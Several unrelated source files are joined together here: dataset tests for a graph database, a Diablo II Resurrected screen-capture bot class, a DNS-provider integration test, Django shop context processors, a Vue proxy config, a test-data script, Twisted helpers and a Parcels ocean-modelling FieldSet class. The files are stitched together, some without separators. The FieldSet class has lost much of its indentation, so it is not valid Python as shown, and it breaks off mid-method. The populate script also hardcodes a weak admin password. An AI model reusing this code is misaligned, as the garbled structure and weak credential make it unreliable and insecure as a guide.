                        v_u_negtype_set = set(v_u_negtype)
                        self.assertEqual(uvt.shape[0], len(u_v_type_set))  # Make sure no redundant edges
                        self.assertEqual(u_v_type_set, v_u_negtype_set)
                        # Every node gets a self loop after collation
                        for i in range(bdgl.number_of_nodes()):
                            self.assertIn((i, i, 0), u_v_type_set)
                        # Self loops have type 0
                        for u, v, type in u_v_type:
                            if u == v:
                                self.assertEqual(0, type)
                        # Features have all the right keys and numbers of values
                        self.assertGreater(len(features.keys()), 0)
                        for node_type, feats in features.items():
                            feat_keys = set(feats.keys())
                            # Ignore the label feature
                            if node_type == label_node_type:
                                feat_keys = feat_keys.union([label_feature_name])
                            self.assertEqual(feat_keys, self.db_info['node_types_and_features'][node_type].keys())
                            node_type_int = self.db_info['node_type_to_int'][node_type]
                            n_nodes_this_type = (bdgl.ndata['node_types'] == node_type_int).sum().item()
                            for feat_vals in feats.values():
                                self.assertEqual(n_nodes_this_type, feat_vals.shape[0])
                        # Only test points have labels
                        if split == 'test':
                            self.assertIsNone(label)
                        else:
                            self.assertIsNotNone(label)
                        # Label isn't present in features
                        self.assertNotIn(label_feature_name, features[label_node_type].keys())
        def test_null_counts_in_database_are_reasonable_and_match_preprocessed_datapoints(self):
            """Cross-check per-feature null counts of the preprocessed
            datapoints against the `n_null_values` recorded in db_info."""
            # Count up nulls in preprocessed datapoints
            n_null_counts = {}
            for split, loader in self.loaders.items():
                for _, (_, _, _, features, _) in tqdm(loader.dataset):
                    for node_type, f in features.items():
                        n_null_counts.setdefault(node_type, {})
                        for feature_name, values in f.items():
                            n_null_counts[node_type].setdefault(feature_name, 0)
                            n_null_counts[node_type][feature_name] += values.count(None)
            # Make sure nulls in preprocessed datapoints match those in db_info
            for node_type, features in self.db_info['node_types_and_features'].items():
                for feature_name, feature_info in features.items():
                    # Skip target feature, because it's not in the node features
                    if self.db_info['label_feature'] == '{}.{}'.format(node_type, feature_name):
                        continue
                    self.assertEqual(n_null_counts[node_type][feature_name], feature_info['n_null_values'],
                                     f'node_type: {node_type}, feature_name: {feature_name}')
|
import numpy as np
from mss import mss
import cv2
import time
from logger import Logger
from typing import Tuple
from config import Config
from utils.misc import load_template
import os
class Screen:
    """Grabs images from screen and converts different coordinate systems to each other.

    Coordinate systems:
      * "monitor" coords: absolute desktop coordinates (what mss uses).
      * "screen" coords: relative to the top-left of the D2R window ROI.
      * "abs" coords: origin at the center of the window (the character).
    """
    def __init__(self, monitor: int = 0):
        # Locate the D2R window on the chosen monitor by template-matching
        # either the main-menu logo or an in-game reference element, then
        # store the window ROI for subsequent grabs.
        self._sct = mss()
        monitor_idx = monitor + 1 # sct saves the whole screen (including both monitors if available at index 0, then monitor 1 at 1 and 2 at 2)
        if len(self._sct.monitors) == 1:
            Logger.error("How do you not have a monitor connected?!")
            os._exit(1)
        if monitor_idx >= len(self._sct.monitors):
            Logger.warning("Monitor index not available! Choose a smaller number for 'monitor' in the param.ini. Forcing value to 0 for now.")
            monitor_idx = 1
        self._config = Config()
        self._monitor_roi = self._sct.monitors[monitor_idx]
        # auto find offests
        template = load_template(f"assets/templates/main_menu_top_left.png", 1.0)
        template_ingame = load_template(f"assets/templates/window_ingame_offset_reference.png", 1.0)
        start = time.time()
        found_offsets = False
        Logger.info("Searching for window offsets. Make sure D2R is in focus and you are on the hero selection screen")
        debug_max_val = 0
        # Retry matching for up to 20 seconds.
        while time.time() - start < 20:
            img = self.grab()
            # Re-create the mss handle each iteration so the grab reflects
            # the current screen contents.
            self._sct = mss()
            res = cv2.matchTemplate(img, template, cv2.TM_CCOEFF_NORMED)
            res_ingame = cv2.matchTemplate(img, template_ingame, cv2.TM_CCOEFF_NORMED)
            _, max_val, _, max_pos = cv2.minMaxLoc(res)
            _, max_val_ingame, _, max_pos_ingame = cv2.minMaxLoc(res_ingame)
            # We are in game: translate the in-game reference match back to
            # the window's top-left corner using the configured offsets.
            if max_val_ingame > max_val:
                max_val = max_val_ingame
                offset_x, offset_y = max_pos_ingame
                max_pos = (
                    offset_x - self._config.ui_pos["ingame_ref_x"],
                    offset_y - self._config.ui_pos["ingame_ref_y"],
                )
            # Save max found scores for debug in case it fails
            if max_val > debug_max_val:
                debug_max_val = max_val
            # NOTE(review): 0.84 / 0.93 thresholds appear empirically chosen;
            # not derived from anything visible here.
            if max_val > 0.84:
                if max_val < 0.93:
                    Logger.warning(f"Your template match score to calc corner was lower then usual ({max_val*100:.1f}% confidence). " +
                                   "You might run into template matching issues along the way!")
                offset_left, offset_top = max_pos
                Logger.debug(f"Set offsets: left {offset_left}px, top {offset_top}px")
                # Shift the ROI to the window's top-left corner, then clamp
                # it to the configured window size.
                self._monitor_roi["top"] += offset_top
                self._monitor_roi["left"] += offset_left
                self._monitor_x_range = (self._monitor_roi["left"] + 10, self._monitor_roi["left"] + self._monitor_roi["width"] - 10)
                self._monitor_y_range = (self._monitor_roi["top"] + 10, self._monitor_roi["top"] + self._monitor_roi["height"] - 10)
                self._monitor_roi["width"] = self._config.ui_pos["screen_width"]
                self._monitor_roi["height"] = self._config.ui_pos["screen_height"]
                found_offsets = True
                break
        if not found_offsets:
            if self._config.general["info_screenshots"]:
                cv2.imwrite("./info_screenshots/error_d2r_window_now_found_" + time.strftime("%Y%m%d_%H%M%S") + ".png", self.grab())
            Logger.error("Could not find D2R logo at hero selection or template for ingame, shutting down")
            Logger.error(f"The max score that could be found was: ({debug_max_val*100:.1f}% confidence)")
            raise RuntimeError("Could not determine window offset. Please make sure you have the D2R window " +
                               f"focused and that you are on the hero selection screen when pressing {self._config.general['resume_key']}")
    def convert_monitor_to_screen(self, screen_coord: Tuple[float, float]) -> Tuple[float, float]:
        """Translate absolute desktop coordinates into window-relative coordinates."""
        return (screen_coord[0] - self._monitor_roi["left"], screen_coord[1] - self._monitor_roi["top"])
    def convert_screen_to_monitor(self, screen_coord: Tuple[float, float]) -> Tuple[float, float]:
        """Translate window-relative coordinates into absolute desktop
        coordinates, clamped to stay inside the window's safe margins."""
        x = screen_coord[0] + self._monitor_roi["left"]
        y = screen_coord[1] + self._monitor_roi["top"]
        return (np.clip(x, *self._monitor_x_range), np.clip(y, *self._monitor_y_range))
    def convert_abs_to_screen(self, abs_coord: Tuple[float, float]) -> Tuple[float, float]:
        # abs has it's center on char which is the center of the screen
        return ((self._monitor_roi["width"] // 2) + abs_coord[0], (self._monitor_roi["height"] // 2) + abs_coord[1])
    def convert_screen_to_abs(self, screen_coord: Tuple[float, float]) -> Tuple[float, float]:
        """Inverse of convert_abs_to_screen: window coords -> character-centered coords."""
        return (screen_coord[0] - (self._monitor_roi["width"] // 2), screen_coord[1] - (self._monitor_roi["height"] // 2))
    def convert_abs_to_monitor(self, abs_coord: Tuple[float, float]) -> Tuple[float, float]:
        """Character-centered coords -> absolute desktop coords (clamped)."""
        screen_coord = self.convert_abs_to_screen(abs_coord)
        monitor_coord = self.convert_screen_to_monitor(screen_coord)
        return monitor_coord
    def grab(self) -> np.ndarray:
        """Capture the current window ROI; the 4th (alpha) channel is dropped."""
        img = np.array(self._sct.grab(self._monitor_roi))
        return img[:, :, :3]
if __name__ == "__main__":
    # Manual debugging harness: continuously grab the window and overlay the
    # configured UI regions of interest on top of the captured frame.
    from config import Config
    config = Config()
    screen = Screen(config.general["monitor"])
    while True:
        start = time.time()
        test_img = screen.grab().copy()
        # print(time.time() - start)
        show_roi = True
        show_pt = True
        if show_roi:
            for roi_key, roi in config.ui_roi.items():
                x, y, w, h = roi
                top_left = (x, y)
                bottom_right = (x + w, y + h)
                cv2.rectangle(test_img, top_left, bottom_right, (0, 255, 0), 2)
                cv2.putText(test_img, roi_key, (top_left[0], top_left[1] + 20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1, cv2.LINE_AA)
        if show_pt:
            pass
        cv2.imshow("test", test_img)
        cv2.waitKey(1)
|
# Test for one implementation of the interface
from lexicon.providers.glesys import Provider
from integration_tests import IntegrationTests
from unittest import TestCase
import pytest
# Hook into testing framework by inheriting unittest.TestCase and reuse
# the tests which *each and every* implementation of the interface must
# pass, by inheritance from define_tests.TheTests
class GlesysProviderTests(TestCase, IntegrationTests):
    """Integration tests for the Glesys DNS provider.

    The provider-agnostic test battery is inherited from IntegrationTests;
    only provider-specific configuration and skips live here.
    """
    Provider = Provider
    provider_name = 'glesys'
    domain = "capsulecd.com"

    def _filter_headers(self):
        # Strip credentials from the recorded HTTP cassettes.
        return ['Authorization']

    # TODO: this should be enabled
    @pytest.mark.skip(reason="regenerating auth keys required")
    def test_Provider_when_calling_update_record_should_modify_record_name_specified(self):
        return

    @pytest.fixture(autouse=True)
    def skip_suite(self, request):
        # BUG FIX: `Node.get_marker` was removed in pytest 4.0;
        # `get_closest_marker` is the supported replacement and behaves the
        # same for this presence check.
        if request.node.get_closest_marker('ext_suite_1'):
            pytest.skip('Skipping extended suite')
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = '1.0 Beta'
import paddle
from . import config
from . import parameter
from . import geometry
from . import bc
from . import ic
from . import pde
from . import network
from . import algorithm
from . import loss
from . import optimizer
from . import solver
from . import visu
from . import data
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from shop.conf import app_settings
from shop.models.customer import CustomerModel
def customer(request):
    """
    Add the customer to the RequestContext
    """
    # Fixed typo in the module path ('middlerware' -> 'middleware') so the
    # error message points users at the real middleware class.
    msg = "The request object does not contain a customer. Edit your MIDDLEWARE_CLASSES setting to insert 'shop.middleware.CustomerMiddleware'."
    assert hasattr(request, 'customer'), msg
    context = {
        'customer': request.customer,
        'site_header': app_settings.APP_LABEL.capitalize(),
    }
    if request.user.is_staff:
        # Staff users may emulate another customer; fall back silently if
        # the session key is absent or references a deleted customer.
        try:
            context.update(customer=CustomerModel.objects.get(pk=request.session['emulate_user_id']))
        except (CustomerModel.DoesNotExist, KeyError, AttributeError):
            pass
    return context
def ng_model_options(request):
    """
    Add ng-model-options to the context, since these settings must be configurable
    """
    options = {}
    options['EDITCART_NG_MODEL_OPTIONS'] = app_settings.EDITCART_NG_MODEL_OPTIONS
    options['ADD2CART_NG_MODEL_OPTIONS'] = app_settings.ADD2CART_NG_MODEL_OPTIONS
    return options
|
// Vue CLI dev-server configuration: proxy /api requests to a local backend.
module.exports = {
  devServer: {
    proxy: {
      '/api': {
        target: 'http://127.0.0.1:3000', // point this at your own backend API
        changeOrigin: true, // rewrite the Origin header so the backend accepts cross-origin requests
        ws: true,
        pathRewrite: {
          // strip the /api prefix before forwarding
          '^/api': ''
        }
      }
    }
  }
}
from django.contrib.auth.models import User
from EkList.models import Auction
import datetime
import pytz
def populate():
    """
    This fills the EkList Django database with 99 users, and 1 auction for each of them.
    It then adds a single bid for 1/7th of those auctions, from 6 different users (id 1-6)
    It also creates an admin account.
    Please note that this script has to be run from the Django python shell, so Django knows which app settings to use.
    Test data was dumped to fixture with manage.py dumpdata --natural-foreign --natural-primary --indent=4 > testdata.json
    """
    for number in range(1, 100):
        user = User.objects.create_user(username=str(number), password=str(number))
        user.save()
        auction = Auction()
        auction.id = number
        auction.title = u"User {} item".format(user.username)
        auction.description = auction.title
        auction.minimum_bid = 5.0
        auction.expires = datetime.datetime(year=2016, month=12, day=24, hour=13, minute=0, tzinfo=pytz.utc)
        auction.creator_username = user.username
        # NOTE(review): `expires` is timezone-aware but `created` is naive —
        # confirm whether the project's USE_TZ setting expects aware values.
        auction.created = datetime.datetime.now()
        auction.save()
    for number in range(1, 99, 7):
        # print() works on both Python 2 and 3; the bare `print number`
        # statement was a SyntaxError under Python 3.
        print(number)
        auction = Auction.get_by_id(number)
        auction.current_bid = 10.0
        auction.current_bid_timestamp = datetime.datetime.now()
        auction.current_bidder_username = User.objects.get(username=str((number % 6) + 1)).username
        auction.save()
    superuser = User.objects.create_superuser(username="admin", email="[email protected]", password="secureadminpassword")
    superuser.save()


if __name__ == "__main__":
    populate()
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
General functional-style helpers for disttrial.
"""
from functools import partial, wraps
from typing import Awaitable, Callable, Optional, TypeVar
from twisted.internet.defer import Deferred, succeed
_A = TypeVar("_A")
_B = TypeVar("_B")
_C = TypeVar("_C")
def fromOptional(default: _A, optional: Optional[_A]) -> _A:
    """
    Get a definite value from an optional value.

    @param default: The value to return if the optional value is missing.

    @param optional: The optional value to return if it exists.
    """
    return default if optional is None else optional
async def sequence(a: Awaitable[_A], b: Awaitable[_B]) -> _B:
    """
    Wait for one action to complete and then another.

    If either action fails, failure is propagated.  If the first action
    fails, the second action is not waited on.
    """
    await a
    second_result = await b
    return second_result
def flip(f: Callable[[_A, _B], _C]) -> Callable[[_B, _A], _C]:
    """
    Create a function like another but with the order of the first two
    arguments flipped.
    """
    @wraps(f)
    def flipped(b, a):
        # Forward to the wrapped callable with the arguments swapped back.
        return f(a, b)

    return flipped
def compose(fx: Callable[[_B], _C], fy: Callable[[_A], _B]) -> Callable[[_A], _C]:
    """
    Create a function that calls one function with an argument and then
    another function with the result of the first function.
    """
    # Both @wraps applications are kept exactly as in the original so the
    # resulting metadata is unchanged (the outer application wins).
    @wraps(fx)
    @wraps(fy)
    def composed(value):
        return fx(fy(value))

    return composed
# Discard the result of an awaitable and substitute None in its place.
#
# How it works: `flip(sequence)` takes (second, first) and runs
# `sequence(first, second)`; partially applying `succeed(None)` as the
# *second* argument means the caller's awaitable is awaited first and its
# result is then replaced by the already-fired None.
#
# Ignore the `Cannot infer type argument 1 of "compose"`
# https://github.com/python/mypy/issues/6220
discardResult: Callable[[Awaitable[_A]], Deferred[None]] = compose(  # type: ignore[misc]
    Deferred.fromCoroutine,
    partial(flip(sequence), succeed(None)),
)
async def iterateWhile(
    predicate: Callable[[_A], bool],
    action: Callable[[], Awaitable[_A]],
) -> _A:
    """
    Call a function repeatedly until its result fails to satisfy a predicate.

    @param predicate: The check to apply.

    @param action: The function to call.

    @return: The result of C{action} which did not satisfy C{predicate}.
    """
    result = await action()
    while predicate(result):
        result = await action()
    return result
def countingCalls(f: Callable[[int], _A]) -> Callable[[], _A]:
    """
    Wrap a function with another that automatically passes an integer counter
    of the number of calls that have gone through the wrapper.
    """
    calls = 0

    def wrapper():
        nonlocal calls
        current = calls
        # Advance the counter even when `f` raises, exactly like the
        # original try/finally formulation.
        calls += 1
        return f(current)

    return wrapper
|
from parcels.field import Field, VectorField, SummedField, SummedVectorField
from parcels.gridset import GridSet
from parcels.grid import RectilinearZGrid
from parcels.tools.loggers import logger
from parcels.tools.converters import TimeConverter
import numpy as np
from os import path
from glob import glob
from copy import deepcopy
__all__ = ['FieldSet']
class FieldSet(object):
"""FieldSet class that holds hydrodynamic data needed to execute particles
:param U: :class:`parcels.field.Field` object for zonal velocity component
:param V: :class:`parcels.field.Field` object for meridional velocity component
:param fields: Dictionary of additional :class:`parcels.field.Field` objects
"""
def __init__(self, U, V, fields=None):
    """Build the FieldSet, registering U, V and any extra fields.

    :param U: zonal-velocity Field (or SummedField); falsy skips registration
    :param V: meridional-velocity Field (or SummedField)
    :param fields: optional dict mapping names to additional Field objects
    """
    self.gridset = GridSet()
    if U:
        self.add_field(U, 'U')
        # The FieldSet's time origin comes from U's grid (first component
        # grid when U is a SummedField).
        self.time_origin = self.U.grid.time_origin if isinstance(self.U, Field) else self.U[0].grid.time_origin
    if V:
        self.add_field(V, 'V')
    # Add additional fields as attributes
    if fields:
        for name, field in fields.items():
            self.add_field(field, name)
    # Optional user hook invoked after deferred data loading; see
    # computeTimeChunk().
    self.compute_on_defer = None
@classmethod
def from_data(cls, data, dimensions, transpose=False, mesh='spherical',
allow_time_extrapolation=None, time_periodic=False, **kwargs):
"""Initialise FieldSet object from raw data
:param data: Dictionary mapping field names to numpy arrays.
Note that at least a 'U' and 'V' numpy array need to be given
1. If data shape is [xdim, ydim], [xdim, ydim, zdim], [xdim, ydim, tdim] or [xdim, ydim, zdim, tdim],
whichever is relevant for the dataset, use the flag transpose=True
2. If data shape is [ydim, xdim], [zdim, ydim, xdim], [tdim, ydim, xdim] or [tdim, zdim, ydim, xdim],
use the flag transpose=False (default value)
3. If data has any other shape, you first need to reorder it
:param dimensions: Dictionary mapping field dimensions (lon,
lat, depth, time) to numpy arrays.
Note that dimensions can also be a dictionary of dictionaries if
dimension names are different for each variable
(e.g. dimensions['U'], dimensions['V'], etc).
:param transpose: Boolean whether to transpose data on read-in
:param mesh: String indicating the type of mesh coordinates and
units used during velocity interpolation:
1. spherical (default): Lat and lon in degree, with a
correction for zonal velocity U near the poles.
2. flat: No conversion, lat/lon are assumed to be in m.
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
"""
fields = {}
for name, datafld in data.items():
# Use dimensions[name] if dimensions is a dict of dicts
dims = dimensions[name] if name in dimensions else dimensions
if allow_time_extrapolation is None:
allow_time_extrapolation = False if 'time' in dims else True
lon = dims['lon']
lat = dims['lat']
depth = np.zeros(1, dtype=np.float32) if 'depth' not in dims else dims['depth']
time = np.zeros(1, dtype=np.float64) if 'time' not in dims else dims['time']
grid = RectilinearZGrid(lon, lat, depth, time, time_origin=TimeConverter(), mesh=mesh)
fields[name] = Field(name, datafld, grid=grid, transpose=transpose,
allow_time_extrapolation=allow_time_extrapolation, time_periodic=time_periodic, **kwargs)
u = fields.pop('U', None)
v = fields.pop('V', None)
return cls(u, v, fields=fields)
def add_field(self, field, name=None):
    """Add a :class:`parcels.field.Field` object to the FieldSet

    :param field: :class:`parcels.field.Field` object to be added
    :param name: Name of the :class:`parcels.field.Field` object to be added

    :raises NotImplementedError: if a plain list is passed (FieldLists
        were replaced by SummedFields).
    """
    name = field.name if name is None else name
    if isinstance(field, SummedField):
        # A SummedField is stored as one attribute, but each component
        # field registers its own grid and back-reference.
        setattr(self, name, field)
        for fld in field:
            self.gridset.add_grid(fld)
            fld.fieldset = self
    elif isinstance(field, list):
        raise NotImplementedError('FieldLists have been replaced by SummedFields. Use the + operator instead of []')
    else:
        setattr(self, name, field)
        self.gridset.add_grid(field)
        field.fieldset = self
def add_vector_field(self, vfield):
"""Add a :class:`parcels.field.VectorField` object to the FieldSet
:param vfield: :class:`parcels.field.VectorField` object to be added
"""
setattr(self, vfield.name, vfield)
vfield.fieldset = self
def check_complete(self):
    """Validate the FieldSet and finish wiring it up.

    Ensures U and V exist, checks that each Field's name matches its
    attribute name, aligns every grid's time axis to the FieldSet time
    origin, and creates the UV (and UVW, when W exists) vector fields.
    """
    assert self.U, 'FieldSet does not have a Field named "U"'
    assert self.V, 'FieldSet does not have a Field named "V"'
    for attr, value in vars(self).items():
        if type(value) is Field:
            assert value.name == attr, 'Field %s.name (%s) is not consistent' % (value.name, attr)
    for g in self.gridset.grids:
        g.check_zonal_periodic()
        if len(g.time) == 1:
            continue
        # Fixed message grammar ('must be have' -> 'must have').
        assert isinstance(g.time_origin, type(self.time_origin)), 'time origins of different grids must have the same type'
        # Re-express this grid's time axis relative to the FieldSet origin.
        g.time = g.time + self.time_origin.reltime(g.time_origin)
        if g.defer_load:
            g.time_full = g.time_full + self.time_origin.reltime(g.time_origin)
        g.time_origin = self.time_origin
    if not hasattr(self, 'UV'):
        if isinstance(self.U, SummedField):
            self.add_vector_field(SummedVectorField('UV', self.U, self.V))
        else:
            self.add_vector_field(VectorField('UV', self.U, self.V))
    if not hasattr(self, 'UVW') and hasattr(self, 'W'):
        if isinstance(self.U, SummedField):
            self.add_vector_field(SummedVectorField('UVW', self.U, self.V, self.W))
        else:
            self.add_vector_field(VectorField('UVW', self.U, self.V, self.W))
@classmethod
def parse_wildcards(cls, paths, filenames, var):
if not isinstance(paths, list):
paths = sorted(glob(str(paths)))
if len(paths) == 0:
notfound_paths = filenames[var] if type(filenames) is dict and var in filenames else filenames
raise IOError("FieldSet files not found: %s" % str(notfound_paths))
for fp in paths:
if not path.exists(fp):
raise IOError("FieldSet file not found: %s" % str(fp))
return paths
@classmethod
def from_netcdf(cls, filenames, variables, dimensions, indices=None,
mesh='spherical', allow_time_extrapolation=None, time_periodic=False, full_load=False, **kwargs):
"""Initialises FieldSet object from NetCDF files
:param filenames: Dictionary mapping variables to file(s). The
filepath may contain wildcards to indicate multiple files,
or be a list of file.
filenames can be a list [files], a dictionary {var:[files]},
a dictionary {dim:[files]} (if lon, lat, depth and/or data not stored in same files as data),
or a dictionary of dictionaries {var:{dim:[files]}}.
time values are in filenames[data]
:param variables: Dictionary mapping variables to variable
names in the netCDF file(s).
:param dimensions: Dictionary mapping data dimensions (lon,
lat, depth, time, data) to dimensions in the netCF file(s).
Note that dimensions can also be a dictionary of dictionaries if
dimension names are different for each variable
(e.g. dimensions['U'], dimensions['V'], etc).
:param indices: Optional dictionary of indices for each dimension
to read from file(s), to allow for reading of subset of data.
Default is to read the full extent of each dimension.
:param mesh: String indicating the type of mesh coordinates and
units used during velocity interpolation:
1. spherical (default): Lat and lon in degree, with a
correction for zonal velocity U near the poles.
2. flat: No conversion, lat/lon are assumed to be in m.
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
:param full_load: boolean whether to fully load the data or only pre-load them. (default: False)
It is advised not to fully load the data, since in that case Parcels deals with
a better memory management during particle set execution.
full_load is however sometimes necessary for plotting the fields.
:param netcdf_engine: engine to use for netcdf reading in xarray. Default is 'netcdf',
but in cases where this doesn't work, setting netcdf_engine='scipy' could help
"""
fields = {}
for var, name in variables.items():
# Resolve all matching paths for the current variable
paths = filenames[var] if type(filenames) is dict and var in filenames else filenames
if type(paths) is not dict:
paths = cls.parse_wildcards(paths, filenames, var)
else:
for dim, p in paths.items():
paths[dim] = cls.parse_wildcards(p, filenames, var)
# Use dimensions[var] and indices[var] if either of them is a dict of dicts
dims = dimensions[var] if var in dimensions else dimensions
dims['data'] = name
inds = indices[var] if (indices and var in indices) else indices
grid = None
# check if grid has already been processed (i.e. if other fields have same filenames, dimensions and indices)
for procvar, _ in fields.items():
procdims = dimensions[procvar] if procvar in dimensions else dimensions
procinds = indices[procvar] if (indices and procvar in indices) else indices
if procdims == dims and procinds == inds:
sameGrid = False
if (type(filenames) is not dict or filenames[procvar] == filenames[var]):
sameGrid = True
elif type(filenames[procvar]) == dict:
sameGrid = True
for dim in ['lon', 'lat', 'depth']:
if dim in dimensions:
sameGrid *= filenames[procvar][dim] == filenames[var][dim]
if sameGrid:
grid = fields[procvar].grid
kwargs['dataFiles'] = fields[procvar].dataFiles
break
fields[var] = Field.from_netcdf(paths, var, dims, inds, grid=grid, mesh=mesh,
allow_time_extrapolation=allow_time_extrapolation,
time_periodic=time_periodic, full_load=full_load, **kwargs)
u = fields.pop('U', None)
v = fields.pop('V', None)
return cls(u, v, fields=fields)
@classmethod
def from_nemo(cls, filenames, variables, dimensions, indices=None, mesh='spherical',
allow_time_extrapolation=None, time_periodic=False,
tracer_interp_method='linear', **kwargs):
"""Initialises FieldSet object from NetCDF files of Curvilinear NEMO fields.
:param filenames: Dictionary mapping variables to file(s). The
filepath may contain wildcards to indicate multiple files,
or be a list of file.
filenames can be a list [files], a dictionary {var:[files]},
a dictionary {dim:[files]} (if lon, lat, depth and/or data not stored in same files as data),
or a dictionary of dictionaries {var:{dim:[files]}}
time values are in filenames[data]
:param variables: Dictionary mapping variables to variable
names in the netCDF file(s).
:param dimensions: Dictionary mapping data dimensions (lon,
lat, depth, time, data) to dimensions in the netCF file(s).
Note that dimensions can also be a dictionary of dictionaries if
dimension names are different for each variable.
Watch out: NEMO is discretised on a C-grid:
U and V velocities are not located on the same nodes (see https://www.nemo-ocean.eu/doc/node19.html ).
__V1__
| |
U0 U1
|__V0__|
To interpolate U, V velocities on the C-grid, Parcels needs to read the f-nodes,
which are located on the corners of the cells.
(for indexing details: https://www.nemo-ocean.eu/doc/img360.png )
:param indices: Optional dictionary of indices for each dimension
to read from file(s), to allow for reading of subset of data.
Default is to read the full extent of each dimension.
:param mesh: String indicating the type of mesh coordinates and
units used during velocity interpolation:
1. spherical (default): Lat and lon in degree, with a
correction for zonal velocity U near the poles.
2. flat: No conversion, lat/lon are assumed to be in m.
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
:param tracer_interp_method: Method for interpolation of tracer fields. Either 'linear' or 'nearest'
Note that in the case of from_nemo(), the velocity fields are default to 'cgrid_linear'
"""
if 'U' in dimensions and 'V' in dimensions and dimensions['U'] != dimensions['V']:
raise RuntimeError("On a c-grid discretisation like NEMO, U and V should have the same dimensions")
interp_method = {}
for v in variables:
if v in ['U', 'V', 'W']:
interp_method[v] = 'cgrid_linear'
else:
interp_method[v] = tracer_interp_method
return cls.from_netcdf(filenames, variables, dimensions, mesh=mesh, indices=indices, time_periodic=time_periodic,
allow_time_extrapolation=allow_time_extrapolation, interp_method=interp_method, **kwargs)
@classmethod
def from_parcels(cls, basename, uvar='vozocrtx', vvar='vomecrty', indices=None, extra_fields=None,
allow_time_extrapolation=None, time_periodic=False, full_load=False, **kwargs):
"""Initialises FieldSet data from NetCDF files using the Parcels FieldSet.write() conventions.
:param basename: Base name of the file(s); may contain
wildcards to indicate multiple files.
:param indices: Optional dictionary of indices for each dimension
to read from file(s), to allow for reading of subset of data.
Default is to read the full extent of each dimension.
:param extra_fields: Extra fields to read beyond U and V
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
:param full_load: boolean whether to fully load the data or only pre-load them. (default: False)
It is advised not to fully load the data, since in that case Parcels deals with
a better memory management during particle set execution.
full_load is however sometimes necessary for plotting the fields.
"""
if extra_fields is None:
extra_fields = {}
dimensions = {}
default_dims = {'lon': 'nav_lon', 'lat': 'nav_lat',
'depth': 'depth', 'time': 'time_counter'}
extra_fields.update({'U': uvar, 'V': vvar})
for vars in extra_fields:
dimensions[vars] = deepcopy(default_dims)
dimensions[vars]['depth'] = 'depth%s' % vars.lower()
filenames = dict([(v, str("%s%s.nc" % (basename, v)))
for v in extra_fields.keys()])
return cls.from_netcdf(filenames, indices=indices, variables=extra_fields,
dimensions=dimensions, allow_time_extrapolation=allow_time_extrapolation,
time_periodic=time_periodic, full_load=full_load, **kwargs)
@property
def fields(self):
    """Returns a list of all the :class:`parcels.field.Field` objects
    associated with this FieldSet"""
    collected = []
    for attr_value in self.__dict__.values():
        if isinstance(attr_value, Field):
            collected.append(attr_value)
        elif isinstance(attr_value, SummedField):
            # Each component of a SummedField is listed at most once.
            for component in attr_value:
                if component not in collected:
                    collected.append(component)
    return collected
def add_constant(self, name, value):
"""Add a constant to the FieldSet. Note that all constants are
stored as 32-bit floats. While constants can be updated during
execution in SciPy mode, they can not be updated in JIT mode.
:param name: Name of the constant
:param value: Value of the constant (stored as 32-bit float)
"""
setattr(self, name, value)
def add_periodic_halo(self, zonal=False, meridional=False, halosize=5):
    """Add a 'halo' to all :class:`parcels.field.Field` objects in a FieldSet,
    through extending the Field (and lon/lat) by copying a small portion
    of the field on one side of the domain to the other.

    :param zonal: Create a halo in zonal direction (boolean)
    :param meridional: Create a halo in meridional direction (boolean)
    :param halosize: size of the halo (in grid points). Default is 5 grid points
    """
    # Grids are extended first so that the fields' halo copies line up
    # with the enlarged coordinate arrays.
    for grid in self.gridset.grids:
        grid.add_periodic_halo(zonal, meridional, halosize)
    for attr, value in iter(self.__dict__.items()):
        if isinstance(value, Field):
            value.add_periodic_halo(zonal, meridional, halosize)
def eval(self, x, y):
    """Evaluate the zonal and meridional velocities (u,v) at a point (x,y)

    :param x: zonal point to evaluate
    :param y: meridional point to evaluate
    :return u, v: zonal and meridional velocities at point"""
    zonal = self.U.eval(x, y)
    meridional = self.V.eval(x, y)
    return zonal, meridional
def write(self, filename):
    """Write FieldSet to NetCDF file using NEMO convention

    :param filename: Basename of the output fileset"""
    logger.info("Generating NEMO FieldSet output with basename: %s" % filename)
    if hasattr(self, 'U'):
        self.U.write(filename, varname='vozocrtx')
    if hasattr(self, 'V'):
        self.V.write(filename, varname='vomecrty')
    for v in self.fields:
        # Use != rather than `is not`: identity comparison against a string
        # literal is implementation-dependent and raises a SyntaxWarning on
        # Python >= 3.8.
        if v.name != 'U' and v.name != 'V':
            v.write(filename)
def advancetime(self, fieldset_new):
    """Replace oldest time on FieldSet with new FieldSet

    :param fieldset_new: FieldSet snapshot with which the oldest time has to be replaced"""
    # Fixed typo in the deprecation message ('simustaneously').
    logger.warning_once("Fieldset.advancetime() is deprecated.\n \
    Parcels deals automatically with loading only 3 time steps simultaneously\
    such that the total allocated memory remains limited.")
    # `advance` records the direction seen so far (+1 forward, -1 backward);
    # mixing directions across fields is an error.
    advance = 0
    for gnew in fieldset_new.gridset.grids:
        gnew.advanced = False
    for fnew in fieldset_new.fields:
        if isinstance(fnew, VectorField):
            continue
        f = getattr(self, fnew.name)
        gnew = fnew.grid
        if not gnew.advanced:
